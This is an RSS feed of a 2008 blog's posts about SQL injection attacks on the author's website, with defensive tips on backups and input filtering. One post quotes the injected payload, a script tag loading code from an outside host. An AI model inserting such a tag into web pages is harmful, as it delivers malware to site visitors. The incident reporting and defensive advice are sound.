<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>rumblepup - entrepreneurial spirit &#187; sql injection</title>
	<atom:link href="http://www.rumblepup.com/tag/sql-injection/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.rumblepup.com</link>
	<description>I&#039;m not a player, I just crush alot</description>
	<lastBuildDate>Sun, 11 Apr 2010 16:19:11 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>F-OFF mr sql injection hacker</title>
		<link>http://www.rumblepup.com/f-off-mr-sql-injection-hacker/</link>
		<comments>http://www.rumblepup.com/f-off-mr-sql-injection-hacker/#comments</comments>
		<pubDate>Mon, 09 Jun 2008 15:09:56 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[sql]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=34</guid>
		<description><![CDATA[Well, after we implemented our fix, mr. sql injecting hacker has been shown the door.  Today we where attacked three more times, both in the url and it seems in our open form fields, and as I&#8217;m apt to say when I do a beat down, FUACATA.
Bye bye sql injection hacker.
]]></description>
			<content:encoded><![CDATA[<p></p><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.rumblepup.com%2Ff-off-mr-sql-injection-hacker%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.rumblepup.com%2Ff-off-mr-sql-injection-hacker%2F" height="61" width="51" /></a></div><p>Well, after we implemented our fix, mr. sql injecting hacker has been shown the door.  Today we where attacked three more times, both in the url and it seems in our open form fields, and as I&#8217;m apt to say when I do a beat down, FUACATA.</p>
<p>Bye bye sql injection hacker.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/f-off-mr-sql-injection-hacker/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>SQL injection attack.  Found the code being used.</title>
		<link>http://www.rumblepup.com/sql-injection-attack-found-the-code-being-used/</link>
		<comments>http://www.rumblepup.com/sql-injection-attack-found-the-code-being-used/#comments</comments>
		<pubDate>Fri, 06 Jun 2008 21:10:46 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[bomb]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[website hack]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=33</guid>
		<description><![CDATA[Ok, the latest state of sql injection attacks have been a nightmare.  We got hacked again, but this time, with a insertion at the url level.  These are a little easier to track. In the server logs, we found the following code in different formats.

Code was messing up my layout.  check out the [...]]]></description>
			<content:encoded><![CDATA[<p></p><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.rumblepup.com%2Fsql-injection-attack-found-the-code-being-used%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.rumblepup.com%2Fsql-injection-attack-found-the-code-being-used%2F" height="61" width="51" /></a></div><p>Ok, the latest state of sql injection attacks have been a nightmare.  We got hacked again, but this time, with a insertion at the url level.  These are a little easier to track. In the server logs, we found the following code in different formats.</p>
<blockquote>
<h5><em>Code was messing up my layout.  check out the text file <a href="http://www.rumblepup.com/sqlattack.txt">here</a>.<br />
</em></h5>
</blockquote>
<p>So look through your server logs for this code in the url with a GET statement.  Have your coder or web programmer disallow all all of the elements being used in the statement.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/sql-injection-attack-found-the-code-being-used/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Latest info on SQL injection attack.</title>
		<link>http://www.rumblepup.com/latest-info-on-sql-injection-attack/</link>
		<comments>http://www.rumblepup.com/latest-info-on-sql-injection-attack/#comments</comments>
		<pubDate>Fri, 06 Jun 2008 01:46:05 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[hack attempts]]></category>
		<category><![CDATA[spamming]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=32</guid>
		<description><![CDATA[I&#8217;ve been getting a lot of requests for information about how to patch this attack.  I&#8217;ve got to back up a minute and tell you that the attack is a pure sql injection attack.  Previously, I reported that it was a windows vulnerability, however, upon further investigation, the server logs I looked at where only [...]]]></description>
			<content:encoded><![CDATA[<p></p><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.rumblepup.com%2Flatest-info-on-sql-injection-attack%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.rumblepup.com%2Flatest-info-on-sql-injection-attack%2F" height="61" width="51" /></a></div><p>I&#8217;ve been getting a lot of requests for information about how to patch this attack.  I&#8217;ve got to back up a minute and tell you that the attack is a pure sql injection attack.  Previously, I reported that it was a windows vulnerability, however, upon further investigation, the server logs I looked at where only &#8220;attempts&#8221; to find a vulnerability.</p>
<p>So I did some more research, and had a talk with <a href="http://jesscoburn.com/">Jess Coburn</a> with <a href="http://www.appliedi.net/">Windows Hosting</a> company Appliedi.net.  Although the attack seems like a Window vulnerability, because of the attempts to gain entry through typical Windows Vulnerabilities, it&#8217;s not.  The media file attempts where only PART of the attempts made.  Apparently this attack is either preempted or followed up by various attempts to gain entry.  On our site, it was not a sql injection in the url, but a search form where we had created that uses what&#8217;s called an &#8220;Enter Event.&#8221;  Quickly, most asp.net search forms eschew keyboard events in favor of click events that call javascript postbacks.  Meaning that if you have an asp.net search control on your website, a person has to click the search button instead of just hitting Enter.</p>
<p>Here lies the problem.  User&#8217;s hate hitting search buttons, but love hitting their enter key.  Enter events are easy to create programmatically, thus so many forums and blogs get spammed and hacked all of the time.  However, javascript postback&#8217;s, not so much.   So far, from the little I do know, it&#8217;s very difficult to program into a hack scan a postback because it does not do a post or get the way most sites do.</p>
<p>But back to the problem and some solutions.</p>
<ol>
<li>Disallow all sql parameters in your form text fields.  There are plenty of tutorials on how to do this.</li>
<li>Read Jess&#8217;s blog, he has a TON of links to great source and a neat rollback sql function to fix these type of sql injections</li>
<li>Remove &#8220;Enter Events&#8221; from your asp and asp.net forms.  Your users are going to have to click on the button for now.</li>
<li>Did I mention go to Jess&#8217;s blog?</li>
<li>Check for your most recent database backup.  If the offending script does not appear, you&#8217;ll have clean code and timestamp as to when the last time your code was clean.</li>
<li>If you don&#8217;t do regular backups, start to get into the habit right NOW.  If you have to do a backup every 2 hours, then do it.  Keep copies online and off.  A reputable hosting company will allow you to make as many backups as you need.</li>
<li>Check your hosting company&#8217;s backup policy.  Appliedi.net backups data at least twice in a 24 hour period.</li>
<li>If you&#8217;re on a dedicated box, assign some space and memory to run sql backup jobs automatically.  I&#8217;m doing some research on best practices.</li>
<li>During the hack attempt, or event, have a BIG GLASS OF SCOTCH, RUM, OR LIQUOR OF YOUR OWN CHOOSING.  These things are not easy to get through, but you need to relax or you&#8217;ll never get through it.</li>
<li>Be better prepared.  Just like a hurricane or earthquake, have a <strong>disaster plan</strong>.</li>
</ol>
<p>Hope this helps.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/latest-info-on-sql-injection-attack/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>The xiaobaishan bomb is now the flyzhu.9966 bomb.</title>
		<link>http://www.rumblepup.com/the-xiaobaishan-bomb-is-now-the-flyzhu-bomb/</link>
		<comments>http://www.rumblepup.com/the-xiaobaishan-bomb-is-now-the-flyzhu-bomb/#comments</comments>
		<pubDate>Wed, 04 Jun 2008 15:05:11 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[bomb]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=31</guid>
		<description><![CDATA[Updated from: The xiaobaishan bomb.
Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one.  We where hacked againg, this the script calling:
&#60;script src=http://flyzhu.9966.org/us/Help.asp&#62;&#60;/script&#62;
Tricky little fucker.
In fact, this hack is pretty well thought out.  Like I said on a previous [...]]]></description>
			<content:encoded><![CDATA[<p></p><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.rumblepup.com%2Fthe-xiaobaishan-bomb-is-now-the-flyzhu-bomb%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.rumblepup.com%2Fthe-xiaobaishan-bomb-is-now-the-flyzhu-bomb%2F" height="61" width="51" /></a></div><p>Updated from: <a href="http://www.rumblepup.com/the-xiaobaishan-bomb-thousands-of-sites-hacked/">The xiaobaishan bomb.</a></p>
<p>Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one.  We where hacked againg, this the script calling:</p>
<blockquote><p>&lt;script src=http://<strong>flyzhu.9966.org</strong>/us/Help.asp&gt;&lt;/script&gt;</p></blockquote>
<p>Tricky little fucker.</p>
<p>In fact, this hack is pretty well thought out.  Like I said on a previous post, this was a sql injection, but our application is made to block sql injection of all kinds.  What happened?</p>
<p>This is a Windows vulnerability.  What the hacker did was attempt to run around the code and gain access to the asp.net Windows Media Player library via our /images/ folder.  They found an image they liked, They ran a some kind of script, and gained access to run a sql insertion script that the application itself did not allow.</p>
<p><strong><span style="color: #993300;">UPDATE:</span> I&#8217;ve got <a href="http://www.rumblepup.com/latest-info-on-sql-injection-attack/">new info</a> on this. </strong> It&#8217;s a pure sql injection hack.</p>
<p>Sneaky fucker.</p>
<p><span style="text-decoration: line-through;">Apparently, this a vulnerability that Microsoft put out a patch to, and our hosting provider didn&#8217;t run it against our VPS yet. </span></p>
<p><span style="color: #993300;"><strong>UPDATE:  Yes they did.  Whoopsee.</strong></span></p>
<p>So to protect your server against this hack, have your hosting provider run the latest updates for the vulnerability.</p>
<p>Right now, there is a reported 10,000 sites affected by this hack.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/the-xiaobaishan-bomb-is-now-the-flyzhu-bomb/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>
